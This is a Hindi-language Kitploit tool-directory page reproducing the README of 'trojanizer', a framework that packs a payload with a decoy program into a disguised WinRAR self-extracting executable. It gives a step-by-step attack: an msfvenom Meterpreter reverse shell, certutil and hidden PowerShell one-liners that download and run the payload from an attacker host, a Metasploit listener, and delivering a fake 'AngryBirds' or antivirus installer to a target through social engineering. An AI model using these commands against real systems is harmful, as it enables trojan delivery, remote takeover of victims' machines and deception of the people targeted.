Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
trojanizer — अपने पेलोड को ट्रोजनाइज़ करें - WinRAR (SFX) ऑटोमेटाइज़ेशन - लिनक्स डिस्ट्रोस के तहत | Kitploit
उपकरण/GitHubGitHub/r00t-3xp10it/trojanizer
फ़िशिंग उपकरणपेलोड जनरेशनशोषणआईडीएस/आईपीएस से बचनापेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलसामाजिक इंजीनियरिंगरेड टीमिंगपेलोड डेवलपमेंट
GitHubr00t-3xp10it/trojanizer

trojanizer

अपने पेलोड को ट्रोजनाइज़ करें - WinRAR (SFX) ऑटोमेटाइज़ेशन - लिनक्स डिस्ट्रोस के तहत

29597518 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें

Version Stage Build AUR

TROJANIZER

root@kitploit:~
संस्करण रिलीज़ : v1.1 (स्थिर)
लेखक : pedro ubuntu  [ r00t-3xp10it ]
कोडनेम: Troia_Revisited
समर्थित डिस्ट्रोस : Ubuntu, Kali, Mint, Parrot OS
Suspicious-Shell-Activity (SSA) RedTeam develop @2017

Trojanizer v1.1-Stable


फ्रेमवर्क विवरण

root@kitploit:~
Trojanizer उपकरण उपयोगकर्ता द्वारा इनपुट की गई दो फाइलों को संपीड़ित करने के लिए WinRAR (SFX) का उपयोग करता है,
और इसे एक SFX निष्पादन योग्य (.exe) संग्रह में बदल देता है। जब SFX संग्रह निष्पादित होता है
तो यह दोनों फाइलों (हमारा पेलोड और वैध एप्लिकेशन) को एक साथ चलाएगा।

संग्रह को निष्पादन के समय लक्ष्य के लिए कम संदिग्ध बनाने के लिए, trojanizer
SFX फ़ाइल के डिफ़ॉल्ट आइकन (.ico) को उपयोगकर्ता द्वारा चुने गए आइकन से बदलने का प्रयास करेगा,
और सभी SFX संग्रह सैंडबॉक्स संदेशों को दबा देगा (Silent=1 | Overwrite=1)।

'Trojanizer ट्रोजन नहीं बनाएगा, लेकिन लक्ष्य के दृष्टिकोण से, यह ट्रोजन व्यवहार की नकल करता है'
(पेलोड को पृष्ठभूमि में निष्पादित करें, जबकि वैध एप्लिकेशन अग्रभूमि में निष्पादित होता है)।

Trojanizer v1.1-Stable




निर्भरताएं (बैकएंड एप्लिकेशन)

root@kitploit:~
Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (wine में स्थापित)
"Trojanizer.sh आवश्यकतानुसार सभी निर्भरताओं को डाउनलोड/स्थापित करेगा"
╔────────────────────────────────────────────────────────────────────────────────────────────╗
|        यह अनुशंसित है कि 'settings' फ़ाइल में विकल्प: SYSTEM_ARCH=[ your_sys_arch ]       |
|        को संपादित और कॉन्फ़िगर करें, इससे पहले कि आप पहली बार उपकरण चलाने का प्रयास करें। |
╚────────────────────────────────────────────────────────────────────────────────────────────╝

Trojanizer v1.1-Stable


स्वीकार्य पेलोड (एजेंट)

root@kitploit:~
.exe | .bat | .vbs | .ps1
"वे सभी पेलोड जिन्हें विंडोज/SFX स्वचालित रूप से निकाल-निष्पादित कर सकता है"

सुझाव: यदि settings फ़ाइल में 'SINGLE_EXEC=ON' चुना गया है,
तो trojanizer इनपुट के लिए किसी भी प्रकार का एक्सटेंशन स्वीकार करेगा।

स्वीकार्य वैध एप्लिकेशन (डिकॉय)

root@kitploit:~
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | आदि ..
"वे सभी एप्लिकेशन जिन्हें विंडोज/SFX स्वचालित रूप से निकाल-निष्पादित कर सकता है"




उन्नत सेटिंग्स

root@kitploit:~
╔─────────────────────────────────────────────────────────────────────────────────────────╗
|         Trojanizer 'उन्नत विकल्प' केवल 'settings' फ़ाइल में ही सुलभ हैं,              |
|       और इन्हें मुख्य उपकरण (Trojanizer.sh) चलाने से पहले ही कॉन्फ़िगर किया जा सकता है |
╚─────────────────────────────────────────────────────────────────────────────────────────╝

-- Presetup उन्नत विकल्प
Trojanizer को दो संपीड़ित फाइलों (SFX संग्रह) के निष्कर्षण/निष्पादन से पहले एक प्रोग्राम + कमांड निष्पादित करने के लिए कॉन्फ़िगर किया जा सकता है। यह उपयोगकर्ताओं को लक्ष्य प्रणाली में वास्तविक निष्कर्षण होने से पहले एक दूरस्थ कमांड निष्पादित करने के लिए पूर्व-स्थापित सॉफ़्टवेयर का लाभ उठाने की अनुमति देता है। यदि सक्रिय है, तो trojanizer निष्पादित होने वाले कमांड के लिए (zenity सैंडबॉक्स) पूछेगा Trojanizer v1.1-Stable

-- single_file_execution
आइए निम्नलिखित परिदृश्य पर विचार करें: आपके पास एक dll पेलोड है जिसे आप इनपुट करना चाहते हैं और निष्कर्षण पर निष्पादित करना चाहते हैं, लेकिन SFX संग्रह सीधे dll फ़ाइलों को निष्पादित नहीं कर सकते हैं। यह सेटिंग उपयोगकर्ताओं को एक बैच स्क्रिप्ट (.bat) इनपुट करने की अनुमति देती है जिसका उपयोग dll पेलोड को निष्पादित करने के लिए किया जाएगा। Trojanizer को बस इतना करना है कि SFX संग्रह को दोनों फाइलों को निकालने और फिर script.bat को निष्पादित करने का निर्देश दे। Trojanizer v1.1-Stable

root@kitploit:~
╔────────────────────────────────────────────────────────────────────────────────────────────────╗
|  single_file_execution स्विच का डिफ़ॉल्ट व्यवहार उपयोगकर्ता द्वारा इनपुट की गई दो फाइलों को  |
|  संपीड़ित करना है, लेकिन निष्कर्षण के समय केवल एक को निष्पादित करना (दूसरी इनपुट फ़ाइल निष्पादित |
|  होगी) ..                                                                                    |
╚────────────────────────────────────────────────────────────────────────────────────────────────╝



TROJANIZER और एप्लिकेशन व्हाइटलिस्टिंग बाईपास

root@kitploit:~
╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|   बहुत से लोगों द्वारा बहुत अच्छा काम किया गया है, विशेष रूप से @subTee, एप्लिकेशन व्हाइटलिस्टिंग बाईपास के संबंध में |
|   जो अंततः हम यहाँ चाहते हैं: Microsoft के बिल्ट-इन बाइनरी का दुरुपयोग करके मनमाना कोड निष्पादित करना।              |
| https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/ |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝

निम्नलिखित अभ्यास बताता है कि कैसे trojanizer के 'single_file_execution' और 'Presetup' उन्नत स्विच का उपयोग करके
किसी भी पेलोड को ड्रॉप (दूरस्थ डाउनलोड) और निष्पादित करने के लिए 'certutil' या 'powershell' appl_whitelisting_bypass ओनलाइनर का उपयोग किया जाए।


1º - मेटास्प्लॉइट का उपयोग करके अपना पेलोड बनाएं
     msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - payload.exe को apache2 वेबरूट पर कॉपी करें और सेवा शुरू करें
     cp payload.exe /var/www/html/payload.exe
     service apache2 start

3º - Trojanizer 'settings' फ़ाइल संपादित करें और सक्रिय करें:
     PRE_SETUP=ON
     SINGLE_EXEC=ON

4º - trojanizer उपकरण चलाना
     संपीड़ित करने के लिए पेलोड => <path-to>/screenshot.png (इससे कोई फर्क नहीं पड़ता कि आप क्या संपीड़ित करते हैं)
     निष्कर्षण पर इस फ़ाइल को निष्पादित करें => <path-to>/AngryBirds.exe (डिकॉय एप्लिकेशन के रूप में निष्पादित करने के लिए)
     PRESETUP सैंडबॉक्स => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\\payload.exe && start %TEMP%\\payload.exe
     SFX फ़ाइल नाम => AngryBirds_installer (बनाए जाने वाले SFX संग्रह का नाम)
     आइकन बदलें => Windows-Store.ico या Steam-logo.ico

5º - एक लिसनर शुरू करें, और सोशल इंजीनियरिंग का उपयोग करके SFX संग्रह को लक्ष्य पर भेजें
     msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'


╔────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╗
|      जब SFX संग्रह निष्पादित होता है, तो यह हमारे apache2 वेबसर्वर से payload.exe को लक्ष्य पर डाउनलोड करेगा और      |
|    'screenshot.png' और 'AngryBirds.exe' को निकालने से पहले इसे निष्पादित करेगा (अंतिम वाला डिकॉय के रूप में काम करेगा) |
╚────────────────────────────────────────────────────────────────────────────────────────────────────────────────────╝


निम्नलिखित ओनलाइनर पिछले 'certutil' अभ्यास के समान परिणाम प्राप्त करने के लिए 'powershell(Downloadfile+start)' विधि का उपयोग करता है ..
cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

निम्नलिखित ओनलाइनर लगभग समान परिणाम प्राप्त करने के लिए 'powershell(IEX+downloadstring)' विधि का उपयोग करता है (payload.ps1 डिस्क को स्पर्श नहीं करता है)
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"




डाउनलोड/स्थापित करें

root@kitploit:~
1º - github से फ्रेमवर्क डाउनलोड करें
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - फ़ाइलों के निष्पादन अनुमतियाँ सेट करें
     cd trojanizer
     sudo chmod +x *.sh

3º - फ्रेमवर्क कॉन्फ़िगर करें
     nano settings

4º - मुख्य उपकरण चलाएं
     sudo ./Trojanizer.sh




फ्रेमवर्क स्क्रीनशॉट

xsf.conf - निष्कर्षण पर दोनों फ़ाइलों को निष्पादित करें (ट्रोजन व्यवहार) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup (उन्नत विकल्प) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil) Trojanizer v1.1-Stable
xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX) Trojanizer v1.1-Stable
आइकन बदलने के साथ अंतिम sfx संग्रह
Trojanizer v1.1-Stable
SFX संग्रह के अंदर (winrar के साथ खोलें) - ट्रोजन व्यवहार
Trojanizer v1.1-Stable
SFX संग्रह के अंदर (winrar के साथ खोलें) - single_file_execution
Trojanizer v1.1-Stable




वीडियो ट्यूटोरियल

Trojanizer - AVG एंटी-वायरस नकली इंस्टॉलर (ट्रोजन व्यवहार)
https://www.youtube.com/watch?v=BIn6_ccZrI0

Trojanizer - single_file_execution (ट्रोजन व्यवहार नहीं)
https://www.youtube.com/watch?v=Ze0JkVtKbns



विशेष धन्यवाद:

@subTee | @enigma0x3 | @H4d3s (SSA)

संदर्भ:
http://acritum.com/software/manuals/winrar/
https://blog.conscioushacker.io/index.php/2017/11/17/application-whitelisting-bypass-msbuild-exe/
https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/

बग रिपोर्ट करें:

https://github.com/r00t-3xp10it/trojanizer/issues

-- Suspicious-Shell-Activity© (SSA) RedTeam develop @2017 --

टूल डाउनलोड करें